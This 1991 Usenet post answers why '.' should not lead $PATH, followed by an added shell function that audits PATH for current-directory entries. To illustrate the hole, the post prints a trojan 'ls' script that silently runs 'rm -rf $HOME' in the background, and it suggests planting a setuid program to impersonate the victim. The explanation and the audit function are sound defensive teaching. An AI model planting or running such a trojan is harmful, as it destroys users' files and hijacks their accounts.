dot in path
Jonathan I. Kamens
jik at athena.mit.edu
Fri Feb 22 15:09:32 AEST 1991
In article <1991Feb22.004010.13359 at zip.eecs.umich.edu>, bguthy at amazon.eecs.umich.edu (Bala S. Guthy) writes:
|> Hello, I remember when I first learnt Unix, the instructor said,
|> that "." should never be the first thing in one's $path. It had
|> something to do with a security hole in Unix. Does anyone know
|> what and if there is any disadvantage to having "." as the first
|> entry in $path.
Because if you cd into a directory in which someone else has placed a trojan
horse named the same as a common system utility, and then run that utility,
then you're actually running the trojan horse.
Example: I create a shell script in my home directory called "ls" which does
this:
    #!/bin/sh
    nice /bin/sh -c "rm -rf $HOME &"
    exec /bin/ls $*
You cd into my home directory out of curiosity and type "ls". You're scrod.
You might not even notice that your files are disappearing.
Alternatively, I could make my trojan horse create a program that is setuid
to you that I can run at my leisure to become you.
You get the idea, I hope.
--
Jonathan Kamens USnail:
MIT Project Athena 11 Ashford Terrace
jik at Athena.MIT.EDU Allston, MA 02134
Office: 617-253-8085 Home: 617-782-0710
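A defensive check for the problem described in the post above, as an added example that is not part of the original message. The function name audit_path and the sample PATH values are constructed for illustration. It lists the PATH entries that resolve against the current directory, including empty entries (a leading, trailing or doubled colon), which the shell treats the same as an explicit ".".

```shell
#!/bin/sh
# Added example (not from the original post): report PATH entries that are
# searched relative to the current directory.

audit_path() {
    # $1: PATH string to audit; defaults to the caller's $PATH.
    ap_rest="${1-$PATH}:"   # sentinel colon so a trailing empty entry is seen
    ap_pos=0
    while [ -n "$ap_rest" ]; do
        ap_entry=${ap_rest%%:*}   # text before the first colon
        ap_rest=${ap_rest#*:}     # everything after the first colon
        ap_pos=$((ap_pos + 1))
        case $ap_entry in
            '')   printf '%s\n' "$ap_pos: empty entry (current directory)" ;;
            .|./) printf '%s\n' "$ap_pos: . (current directory)" ;;
            /*)   ;;  # absolute path: not searched relative to cwd
            *)    printf '%s\n' "$ap_pos: relative entry: $ap_entry" ;;
        esac
    done
    return 0
}

# Constructed sample: "." first, plus a trailing colon that is easy to miss.
audit_path '.:/usr/bin:/bin:'
```

Each output line starts with the position of the entry in the search order, so a finding at position 1 is the case the original question asks about.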